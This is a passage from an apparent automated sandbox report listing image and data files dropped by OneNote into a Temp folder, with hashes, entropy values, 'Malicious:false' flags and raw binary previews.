                                                                                                                                            Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{E0C02ECD-2F6C-4703-AFDB-DE8108A70981}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19235
                                                                                                                                            Entropy (8bit):7.944867159042578
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                            MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                            SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                            SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                            SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{E1456112-D13C-4E98-857F-31BC46B6316D}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):86187
                                                                                                                                            Entropy (8bit):7.951356272886186
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
                                                                                                                                            MD5:FEE4785DF76E93A9DC2F4501CBAEAE12
                                                                                                                                            SHA1:8FB4527BDE05EF208FCDB168098A07707C27501F
                                                                                                                                            SHA-256:F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
                                                                                                                                            SHA-512:7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.*]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....|.,lZKCEB.t...fw|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..W*H<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{E15C8FAF-AD8F-45D7-A376-234041F7964D}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13084
                                                                                                                                            Entropy (8bit):7.940058639272698
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                            MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                            SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                            SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                            SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{E2D6D1CF-7958-42D4-BE3F-F512A9FCFE2B}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2599
                                                                                                                                            Entropy (8bit):7.903700862190034
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                            MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                            SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                            SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                            SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{E3F8CAB1-1E62-4945-8CDE-583C5CB425B2}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.950380155401321
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                            MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                            SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                            SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                            SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{E409EB91-864B-470B-8D42-D253DC5DABD7}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, progressive, precision 8, 1312x424, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):54127
                                                                                                                                            Entropy (8bit):7.804118984558617
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:4uWStwiFAImRuCERn9FCD7OTseOMUX7we1WHzjKALnTCCCCCCCCCCCCCCCCCCCCp:4uWt4AJERnyNenUWHCoTCCCCCCCCCCCm
                                                                                                                                            MD5:2CCB7FD40E61B6DD2CD936E61929FB81
                                                                                                                                            SHA1:B10AC2D16273A785C6B73E4CE047716CB451BE1C
                                                                                                                                            SHA-256:CBF4835796C6C58C2EEBB12BFE73AAAE73D0E9F37C5BD5DC63092ED776485FE8
                                                                                                                                            SHA-512:A83BFF1E484CAB88E97B72083A1E232A87856253928C1434F48C904343845AFEC8D2B1084E0BEF102C46413A34F9D8D1CB25A280FD968FF19927E17601326946
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{E5D3CA54-20A6-4F44-AB01-88CEB8F244B6}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4744
                                                                                                                                            Entropy (8bit):0.7045884309706408
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:fN/TbYyfderSUfdxoOGoXlYltV/x/eFlU:fNLbYyfcr9ToO/XKBIF6
                                                                                                                                            MD5:87A0063D5247D011E1AED56B6ED7FFED
                                                                                                                                            SHA1:9A53AAFDC25FA311C3BD8202C3B4EE2328D22388
                                                                                                                                            SHA-256:3DA3FF43C8BA1B0F149073ADEEA04F4B2ECEDA3C4BEAE808889F0C012C2174ED
                                                                                                                                            SHA-512:69AC16E8E0B62060C77C6DBA52BBE2D65E488945C3B015ACAB54E3B075A02C04099DF0C3CCD782828A0DB37B500E1E2A231A279502E9E65B64E1E8A5C1F55D57
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.R\{..M..Sx.)..zY..F5.L..1....>................?.....I.......*...*...*...*....................................................'f.U.K._......0.......................h.............................................n$..TE.x.[...................O....Xu...............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{E715C1B8-EE00-4A04-AAC3-EC1E76C5058A}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13241
                                                                                                                                            Entropy (8bit):7.931391290415517
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                            MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                            SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                            SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                            SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{E7B78752-1696-4BC8-85A5-A0FA2C9C7D7F}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3879
                                                                                                                                            Entropy (8bit):7.9281351307465044
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                            MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                            SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                            SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                            SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{E7D821AD-4291-41EA-972D-482456DCD565}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 176 x 513, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11043
                                                                                                                                            Entropy (8bit):7.96811228801767
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
                                                                                                                                            MD5:8E9AB9C28B155A66BC5C0DA5E2A4EFB5
                                                                                                                                            SHA1:972E61F162D48F1CEE21963ECBB2FE439105DB55
                                                                                                                                            SHA-256:B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
                                                                                                                                            SHA-512:12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.|.L.|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....|.)

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{E877C4A3-903C-4A59-BFF8-59E7FCE89FB8}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16003
                                                                                                                                            Entropy (8bit):7.959532793770661
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                            MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                            SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                            SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                            SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{E9348A42-2772-423C-BC22-641943C08A4E}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7374
                                                                                                                                            Entropy (8bit):7.955141875077912
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                            MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                            SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                            SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                            SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{E992F02F-98EA-4B7B-B25C-2DE3F0DBE24B}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17289
                                                                                                                                            Entropy (8bit):7.962998633267186
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                            MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                            SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                            SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                            SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                            Malicious:false
